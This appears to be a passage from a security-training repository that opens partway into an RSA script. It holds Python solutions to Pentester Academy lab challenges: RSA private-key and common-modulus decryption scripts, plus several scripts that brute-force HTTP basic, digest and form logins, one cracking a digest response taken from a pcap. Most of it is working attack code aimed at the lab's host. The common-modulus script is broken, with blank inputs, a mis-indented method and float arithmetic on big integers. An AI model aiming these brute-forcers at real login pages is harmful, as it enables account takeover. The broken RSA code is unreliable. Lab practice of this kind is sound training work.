39 |     return a
40 |  
41 | N = gmpy.mpz(1234567901234567901234567901234567901234567901234567901234567901234567901234567901234567901234567901234717283950617286419848309592787370341273747873748589842596504841720640394292494902982398728707626152070858561887866820294694355043665630787554216250435696249211077918492329836269203487802969283814463105539751494270071615655993342320948911726155780461076389165979343111846372150233530706650782398611627761941453287668879721303235540318234064753133821318150932201158894328482335388315649950679451828519628822971)
42 | r = int(gmpy.ceil(gmpy.sqrt(N)))
43 |  
44 | p = gmpy.mpz(1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111178333333333334444487294872309872209128742098742420984723982734329843732987178261897634983473987323987439874932873402398720978429874230987340298723116269)
45 | q = gmpy.mpz(1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111178333333333334444487294872309872209128742098742420984723982734329843732987178261897634983473987323987439874932873402398720978429874230987340298723109959)
46 | e = 65537L
47 | phi = (p-1)*(q-1)
48 |  
49 | d = gmpy.gcdext(e, phi)[1]
50 | if d < 0:
51 |         d = d + phi
52 |  
53 | val = getpass('factor 1')
54 | username = pow(gmpy.mpz(int(val[0])), e, N)
55 | username = 418296719726
56 | password = pow(gmpy.mpz(username), d, N)
57 | print password
58 | 


--------------------------------------------------------------------------------
/RSA Attacks/RSA: Common modulus attack.py:
--------------------------------------------------------------------------------
 1 |  #!/usr/bin/python3.4
 2 |    # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com   
 3 |    # This program will help to decrypt cipher text to plain text if you have
 4 |    # more than 1 cipher text encrypted with same Modulus (N) but different
 5 |    # exponents. We use extended Euclideangm Algorithm to achieve this.
 6 |    
 7 |    __author__ = 'lucif3r'
 8 |    
 9 |    import gmpy2
10 |    
11 |    
12 |    class RSAModuli:
13 |        def __init__(self):
14 |            self.a = 0
15 |            self.b = 0
16 |            self.m = 0
17 |            self.i = 0
18 |        def gcd(self, num1, num2):
19 |            """
20 |            This function os used to find the GCD of 2 numbers.
21 |            :param num1:
22 |            :param num2:
23 |            :return:
24 |            """
25 |            if num1 < num2:
26 |                num1, num2 = num2, num1
27 |            while num2 != 0:
28 |                num1, num2 = num2, num1 % num2
29 |            return num1
30 |        def extended_euclidean(self, e1, e2):
31 |            """
32 |            The value a is the modular multiplicative inverse of e1 and e2.
33 |            b is calculated from the eqn: (e1*a) + (e2*b) = gcd(e1, e2)
34 |            :param e1: exponent 1
35 |            :param e2: exponent 2
36 |            """
37 |            self.a = gmpy2.invert(e1, e2)
38 |            self.b = (float(self.gcd(e1, e2)-(self.a*e1)))/float(e2)
39 |        def modular_inverse(self, c1, c2, N):
40 |            """
41 |            i is the modular multiplicative inverse of c2 and N.
42 |            i^-b is equal to c2^b. So if the value of b is -ve, we
43 |            have to find out i and then do i^-b.
44 |            Final plain text is given by m = (c1^a) * (i^-b) %N
45 |            :param c1: cipher text 1
46 |            :param c2: cipher text 2
47 |            :param N: Modulus
48 |            """
49 |            i = gmpy2.invert(c2, N)
50 |            mx = pow(c1, self.a, N)
51 |            my = pow(i, int(-self.b), N)
52 |            self.m= mx * my % N
53 |           def print_value(self):
54 |            print("Plain Text: ", self.m)
55 |    
56 |    
57 |    def main():
58 |        c = RSAModuli()
59 |        N  =
60 |        c1 =
61 |        c2 =
62 |        e1 =
63 |        e2 =
64 |        c.extended_euclidean(e1, e2)
65 |        c.modular_inverse(c1, c2, N)
66 |        c.print_value()
67 |     
68 |    if __name__ == '__main__':
69 |        main()
70 | 


--------------------------------------------------------------------------------
/Web Application Challenge's Solutions/WAP Challenge 3 - Brute force basic HTTP auth.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3.4
 2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com__author__ = 'lucif3r'
 3 | 
 4 | # This is the solution to Pentester Academy's WAP Challenge 2: HTTP basic Authentication Brute-
 5 | # Force. The script uses requests library in python 3.4
 6 | 
 7 | import itertools
 8 | import base64
 9 | 
10 | import requests
11 | 
12 | 
13 | def generate_wordlist(words, l):
14 |     """
15 |     :rtype : list
16 |     :param words The string from which words should be made:
17 |     :param l length of the strings:
18 |     :return:
19 |     """
20 |     list_pass = []
21 |     for i in itertools.product(words, repeat=l):
22 |         list_pass.append("".join(i))
23 |     return list_pass
24 | 
25 | 
26 | def brute_force(username):
27 |     """
28 | 
29 | 
30 |     :param username:  Username for Brute forcing
31 |     """
32 |     url = 'http://pentesteracademylab.appspot.com/lab/webapp/basicauth'
33 |     passwords = generate_wordlist('ads', 5)
34 |     print("wordlist generated. Starting Brute FOrce...")
35 | 
36 |     for i in passwords:
37 |         header = username+":"+i
38 |         b64 = base64.b64encode(bytes(header, 'UTF-8'))
39 |         b64 = "Basic " + b64.decode('UTF-8')
40 |         headers = {"Authorization": b64}
41 |         response = requests.post(url, headers = headers)
42 | 
43 |         if response.status_code != 401:
44 |             print('username = ', username, 'Password = ', i)
45 |             break
46 | 
47 | brute_force('admin')
48 | brute_force('nick')


--------------------------------------------------------------------------------
/Web Application Challenge's Solutions/WAP Challenge 5 - Digest Auth Attack.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3.4
 2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com__author__ = 'lucif3r'
 3 | 
 4 | # This is the solution to Pentester Academy's WAP Challenge 4: Digest Authentication Brute-
 5 | # Force. The script uses urllib library in python 3.4
 6 | 
 7 | __author__ = 'lucif3r'
 8 | 
 9 | import urllib.request
10 | import urllib.error
11 | import itertools
12 | 
13 | 
14 | def generate_wordlist(words, l):
15 |     """
16 |     :rtype : list
17 |     :param words The string from which words should be made:
18 |     :param l length of the strings:
19 |     :return:
20 |     """
21 |     list_pass = []
22 |     for i in itertools.product(words, repeat=l):
23 |         list_pass.append("".join(i))
24 |     return list_pass
25 | 
26 | 
27 | def brute_force(username):
28 |     """
29 | 
30 | 
31 |     :param username:  Username for Brute forcing
32 |     """
33 |     url = 'http://pentesteracademylab.appspot.com/lab/webapp/digest/1'
34 |     passwords = generate_wordlist('ads', 5)
35 | 
36 |     print("wordlist generated. Starting Brute FOrce...")
37 |     for i in passwords:
38 |         authhandler = urllib.request.HTTPDigestAuthHandler()
39 |         authhandler.add_password('Pentester Academy', url, username, i)
40 |         opener = urllib.request.build_opener(authhandler)
41 |         urllib.request.install_opener(opener)
42 |         print(i)
43 |         try:
44 |                 page = urllib.request.urlopen(url)
45 |         except urllib.error.HTTPError as e:
46 |                 print("failing")
47 |         else:
48 |                 print ('Username: '+username+' Password: '+i)
49 |                 break
50 | 
51 | 
52 | brute_force('admin')
53 | brute_force('nick')


--------------------------------------------------------------------------------
/Web Application Challenge's Solutions/WAP Challenge 6 - Digest Auth Reloaded.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3.4
 2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com__author__ = 'lucif3r'
 3 | 
 4 | # This is the solution to Pentester Academy's WAP Challenge 5: Digest Authentication Brute-
 5 | # Force Reloaded. The script uses requests library in python 3.4
 6 | __author__ = 'lucif3r'
 7 | 
 8 | import hashlib
 9 | import itertools
10 | 
11 | import requests
12 | 
13 | 
14 | def generate_wordlist(words, l):
15 |     """
16 |     :rtype : list
17 |     :param words The string from which words should be made:
18 |     :param l length of the strings:
19 |     :return:
20 |     """
21 |     list_pass = []
22 |     for i in itertools.product(words, repeat=l):
23 |         list_pass.append("".join(i))
24 |     return list_pass
25 | 
26 | 
27 | def brute_force(username):
28 |     """
29 | 
30 | 
31 |     :rtype : Null
32 |     :param username: Username to Brute FOrce..
33 |     """
34 |     passwords = generate_wordlist('xyz', 5)
35 |     print("Wordlist Generated. Starting to Brute Force...")
36 |     url = 'http://pentesteracademylab.appspot.com/lab/webapp/digest2/1'
37 |     uri = '/lab/webapp/digest2/1'
38 |     Realm = 'Pentester Academy'
39 |     req = requests.get(url)
40 |     nonce = req.headers.get('www-authenticate').split('"')[3]
41 |     for i in passwords:
42 |         hash1_string = (username + ':' + Realm + ':' + i).encode('utf-8')
43 |         hash2_string = ('GET:' + uri).encode('utf-8')
44 | 
45 |         hash1 = hashlib.md5(hash1_string).hexdigest()
46 |         hash2 = hashlib.md5(hash2_string).hexdigest()
47 |         re_string = (hash1 + ':' + nonce + ':' + hash2).encode('utf-8')
48 | 
49 |         response = hashlib.md5(re_string).hexdigest()
50 |         headers = {
51 |         'Authorization': 'Digest username="' + username + '", realm="' + Realm + '", nonce="' + nonce + '", uri="' + uri + '", response="' + response + '", algorithm="MD5"'}
52 | 
53 |         req = requests.get(url, headers=headers)
54 |         if req.status_code != 401:
55 |             print("Username: " + username, "Password: " + i)
56 |             break
57 | 
58 | 
59 | brute_force('nick')
60 | brute_force('admin')


--------------------------------------------------------------------------------
/Web Application Challenge's Solutions/WAP Challenge 7 - Digest Auth Pcap.py:
--------------------------------------------------------------------------------
 1 | __author__ = 'lucif3r'
 2 | 
 3 | import itertools
 4 | import hashlib
 5 | 
 6 | 
 7 | def generate_wordlist(words, l):
 8 |     """
 9 |     :rtype : list
10 |     :param words The string from which words should be made:
11 |     :param l length of the strings:
12 |     :return:
13 |     """
14 |     list_pass = []
15 |     for i in itertools.product(words, repeat=l):
16 |         list_pass.append("".join(i))
17 |     return list_pass
18 | 
19 | 
20 | def brute_force(username):
21 |     response = '0fd7c603fdf61e89bfc9c95fb73e343a'
22 |     uri = '/'
23 |     Realm = 'Pentester-Academy'
24 |     passwords = generate_wordlist('x12yz3', 6)
25 |     nonce = 'X95LDujmBAA=9c8ec8a0aeee0ddf7f24a5a75c57d0f90245d0f5'
26 |     nonce_count = '00000001'
27 |     client_nonce = '89b024ea3adb54ec'
28 |     qop = 'auth'
29 |     for i in passwords:
30 |         print(i)
31 |         hash1_string = (username + ':' + Realm + ':' + i).encode('utf-8')
32 |         hash2_string = ('GET:' + uri).encode('utf-8')
33 | 
34 |         hash1 = hashlib.md5(hash1_string).hexdigest()
35 |         hash2 = hashlib.md5(hash2_string).hexdigest()
36 |         re_string = (hash1 + ':' + nonce + ':' + nonce_count + ':' + client_nonce + ':' + qop + ':' + hash2).encode(
37 |             'utf-8')
38 | 
39 |         response_new = hashlib.md5(re_string).hexdigest()
40 |         if response == response_new:
41 |             print("Username: " + username, "Password: " + i)
42 |             break
43 | 
44 | 
45 | brute_force('webadmin')


--------------------------------------------------------------------------------
/Web Application Challenge's Solutions/WAP challenge 2  - BRute force http login.py:
--------------------------------------------------------------------------------
 1 | __author__ = 'lucif3r'
 2 | 
 3 | '''
 4 | This is the solution for WAP Challenge 2: HTTP Form attacks reloaded by Pentester Academy. This is basically cracked with
 5 | a combination of brute force and HTTP verb tampering vulnerability.
 6 | 
 7 | '''
 8 | 
 9 | import itertools
10 | 
11 | import requests
12 | 
13 | 
14 | def generate_wordlist(words, l):
15 |     """
16 |     :rtype : list
17 |     :param words The string from which words should be made:
18 |     :param l length of the strings:
19 |     :return:
20 |     """
21 |     list_pass = []
22 |     for i in itertools.product(words, repeat=l):
23 |         list_pass.append("".join(i))
24 |     return list_pass
25 | 
26 | 
27 | def brute_force(username):
28 |     """
29 |     :rtype : NULL
30 |     :param username - username to brute force:
31 |     """
32 |     passwords = generate_wordlist('mno', 5)
33 |     location = 'http://pentesteracademylab.appspot.com/lab/webapp/auth/1/login'
34 |     for i in passwords:
35 |         request = requests.head(
36 |             'http://pentesteracademylab.appspot.com/lab/webapp/auth/1/loginscript?email=' + username + '&password=' + i)
37 |         redirect = request.headers['location']
38 |         if redirect != location:
39 |             print('Username =', username, 'Password = ', i)
40 |             print(redirect)
41 |             break
42 | 
43 | 
44 | brute_force('nick@pentesteracademy.com')
45 | brute_force('admin@pentesteracademy.com')
46 | 


--------------------------------------------------------------------------------